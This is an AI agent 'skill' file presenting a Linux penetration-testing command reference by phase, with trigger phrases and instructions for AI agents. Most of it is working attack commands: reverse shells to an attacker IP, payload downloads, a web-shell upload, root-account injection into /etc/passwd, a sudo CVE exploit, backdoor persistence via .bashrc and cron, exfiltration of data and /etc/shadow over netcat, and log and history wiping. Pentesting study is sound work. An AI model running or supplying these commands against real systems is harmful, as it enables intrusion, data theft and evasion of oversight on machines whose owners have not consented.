By name: linux-pentester-command-reference description: Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases triggers: - how do I perform reconnaissance on a Linux system - what commands can I use for privilege escalation on Linux - show me Linux enumeration commands for pentesting - how to find SUID binaries for privilege escalation - what are the key Linux commands for post-exploitation - help me with Linux penetration testing commands - show network reconnaissance commands on Linux - how to enumerate services on a Linux target
Linux Pentester Command Reference
Skill by ara.so — Security Skills collection.
This skill provides access to a curated collection of practical Linux commands and techniques organized by penetration testing phases. The repository contains battle-tested commands from real-world labs, CTFs, and hands-on practice, covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
What This Project Provides
Linux for a Pentester is a knowledge repository containing:
- Essential Linux survival commands for daily pentesting
- Local and network reconnaissance techniques
- Service and user data enumeration commands
- Exploitation techniques (shells, file uploads, initial access)
- Privilege escalation methods (SUID, sudo, kernel exploits)
- Post-exploitation activities (persistence, cleanup, lateral movement)
- Quick reference cheatsheets for common scenarios
Repository Structure
The knowledge base is organized into focused modules:
Linux-for-a-Pentester/
├── 00-General-Commands/ # Daily survival commands
├── 01-Recon/ # Reconnaissance phase
├── 02-Enumeration/ # Deep service enumeration
├── 03-Exploitation/ # Initial access techniques
├── 04-Privilege-Escalation/ # Root escalation methods
├── 05-Post-Exploitation/ # Persistence & lateral movement
└── Cheatsheets/ # Quick reference one-liners
Installation
Clone the repository locally for quick reference during engagements:
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
For quick access during assessments, bookmark or symlink specific directories:
# Create symlink to quick access location
ln -s $(pwd) ~/pentesting-notes
# Or add to PATH for script access
export PATH="$PATH:$(pwd)/scripts"
Key Command Categories
General Commands (Phase 0)
Essential survival commands for system navigation and basic operations:
# System information gathering
uname -a # Kernel version and system info
cat /etc/os-release # Distribution details
hostname # Current hostname
whoami # Current user
id # User ID and group membership
w # Logged in users
last # Login history
# File operations
find / -name "flag.txt" 2>/dev/null # Find files by name
find / -perm -4000 -type f 2>/dev/null # Find SUID binaries
find / -writable -type d 2>/dev/null # Find writable directories
grep -r "password" /home 2>/dev/null # Search for strings
# Network basics
ip a # Network interfaces
ss -tulpn # Active connections and listening ports
netstat -ano # Alternative connection viewer
cat /etc/hosts # Hosts file
cat /etc/resolv.conf # DNS configuration
Reconnaissance (Phase 1)
Local and network discovery commands:
# Local enumeration
ps aux # Running processes
ps aux | grep root # Root processes
cat /etc/passwd # User accounts
cat /etc/group # Group information
cat /etc/shadow # Password hashes (if accessible)
env # Environment variables
history # Command history
cat ~/.bash_history # User bash history
# Network reconnaissance
ping -c 4 <target> # Host availability
for i in {1..254}; do ping -c 1 192.168.1.$i | grep "64 bytes"; done
nmap -sV -p- <target> # Service version scan
nmap -sU -p- <target> # UDP scan
arp -a # ARP cache
route -n # Routing table
# Service identification
curl -I http://<target> # HTTP headers
nc -v <target> <port> # Manual banner grabbing
telnet <target> <port> # Alternative banner grab
Enumeration (Phase 2)
Deep-dive service and data enumeration:
# User enumeration
cat /etc/passwd | cut -d: -f1 # List all users
grep -v -E "^#" /etc/passwd | awk -F: '$3 < 1000 {print $1}' # System users
getent passwd <username> # User details
groups <username> # User groups
# File system enumeration
find / -user root -perm -4000 2>/dev/null # SUID root files
find / -type f -perm -o+w 2>/dev/null # World-writable files
find / -name "*.conf" 2>/dev/null # Configuration files
find / -name "id_rsa" 2>/dev/null # SSH private keys
locate password | more # Files with 'password'
# Service enumeration
systemctl list-units --type=service # Running services
cat /etc/services # Port to service mapping
ls -la /etc/cron* # Cron jobs
cat /etc/crontab # System crontab
crontab -l # User crontab
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
Exploitation (Phase 3)
Initial access and shell techniques:
# Reverse shells
bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/bash <attacker-ip> <port>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f
# Shell stabilization
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice
# File upload techniques
wget http://<attacker-ip>/shell.sh -O /tmp/shell.sh
curl http://<attacker-ip>/shell.sh -o /tmp/shell.sh
scp user@<attacker-ip>:/path/to/file /tmp/
nc -lvp <port> < file.txt # Sender
nc <ip> <port> > file.txt # Receiver
Privilege Escalation (Phase 4)
Techniques to escalate to root:
# SUID exploitation
find / -perm -4000 -type f 2>/dev/null # Find SUID binaries
ls -la /usr/bin/find # Check specific binary
# Example: find SUID exploitation
find . -exec /bin/sh -p \; -quit
# Sudo abuse
sudo -l # List sudo permissions
sudo -u#-1 /bin/bash # CVE-2019-14287 (sudo < 1.8.28)
# Check GTFOBins for specific binaries
# Kernel exploits
uname -a # Kernel version
cat /proc/version # Detailed version
searchsploit kernel $(uname -r) # Search exploits
gcc -o exploit exploit.c # Compile exploit
./exploit # Execute
# Writable /etc/passwd
openssl passwd -1 -salt xyz password123 # Generate hash
echo 'newroot:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
# Cron job abuse
cat /etc/crontab # Check cron jobs
ls -la /etc/cron.* # Cron directories
# Create reverse shell in writable cron script
echo 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' >> /path/to/cron/script.sh
# Capabilities
getcap -r / 2>/dev/null # Find capabilities
# Example: python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# PATH hijacking
echo $PATH # Current PATH
export PATH=/tmp:$PATH # Prepend /tmp
# Create malicious binary in /tmp with same name as legitimate one
Post-Exploitation (Phase 5)
Maintaining access and lateral movement:
# Persistence
echo 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' >> ~/.bashrc
(crontab -l ; echo "@reboot /tmp/backdoor.sh") | crontab -
ssh-keygen -t rsa # Generate SSH key
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
# Data exfiltration
tar czf - /path/to/data | nc <attacker-ip> <port> # Sender
nc -lvp <port> | tar xzf - # Receiver
base64 /etc/shadow | base64 -d > shadow.txt # Encode for transfer
# Cleanup
history -c # Clear command history
rm ~/.bash_history # Remove history file
echo "" > /var/log/auth.log # Clear logs (requires root)
unset HISTFILE # Disable history logging
# Lateral movement
ssh user@<target-host> # SSH to other hosts
for i in {1..254}; do ssh user@192.168.1.$i 2>/dev/null; done
scp file.txt user@<host>:/tmp/ # Copy files to other hosts
Common Patterns and Workflows
Initial Access Workflow
# 1. Reconnaissance
nmap -sV -sC -p- <target-ip> -oN nmap.txt
cat nmap.txt | grep open
# 2. Service enumeration
whatweb http://<target-ip>
nikto -h http://<target-ip>
# 3. Exploitation (example: web shell upload)
curl -X POST -F "file=@shell.php" http://<target-ip>/upload.php
curl http://<target-ip>/uploads/shell.php?cmd=whoami
# 4. Reverse shell
# On attacker machine:
nc -lvnp 4444
# On target via web shell:
bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1'
Privilege Escalation Workflow
# 1. System information gathering
uname -a
cat /etc/issue
cat /etc/*-release
# 2. Automated enumeration (if possible to upload)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# 3. Manual checks
sudo -l
find / -perm -4000 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab
# 4. Exploit and escalate
# Execute appropriate technique based on findings
Troubleshooting
Command Not Found
# Check if binary exists
which <command>
find / -name <command> 2>/dev/null
# Use alternatives
# nc not available → use bash /dev/tcp
# python not available → use python3 or perl
# sudo -l fails → check SUID binaries
Shell Issues
# If shell is not interactive:
python -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -c bash
# If terminal size is wrong:
stty rows 38 columns 116
export TERM=xterm-256color
Permission Denied
# Try with full path
/usr/bin/command instead of command
# Check file permissions
ls -la /path/to/file
# Look for writable directories
find / -writable -type d 2>/dev/null
Network Connection Failures
# Check firewall rules
iptables -L
cat /etc/iptables/rules.v4
# Try different ports
# 443, 80, 53 are often allowed outbound
# Use different protocols
# If TCP fails, try UDP
# If direct connection fails, try DNS tunneling
Integration with AI Agents
When assisting users with this project:
- Identify the pentesting phase the user is in (recon, enum, exploit, privesc, post-exploit)
- Reference the appropriate directory in the repository structure
- Provide relevant commands with explanations of flags and options
- Suggest variations based on the target environment (Linux distro, available tools)
- Warn about operational security implications when appropriate
- Recommend cleanup steps after exploitation activities
Best Practices
- Always get proper authorization before performing penetration testing
- Document all commands and findings during assessments
- Use these notes as a reference, but adapt to specific target environments
- Test commands in controlled lab environments before production use
- Clean up artifacts and close backdoors after authorized testing
- Keep environment variables for sensitive data:
$ATTACKER_IP,$TARGET_IP,$RPORT
Additional Resources
For deeper dives into specific techniques, consult:
- GTFOBins (https://gtfobins.github.io/) for SUID/sudo abuse
- HackTricks (https://book.hacktricks.xyz/) for comprehensive techniques
- PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings)
- PEASS-ng (https://github.com/carlospolop/PEASS-ng) for automated enumeration
This skill enables AI agents to guide users through Linux penetration testing phases with practical, field-tested commands and techniques.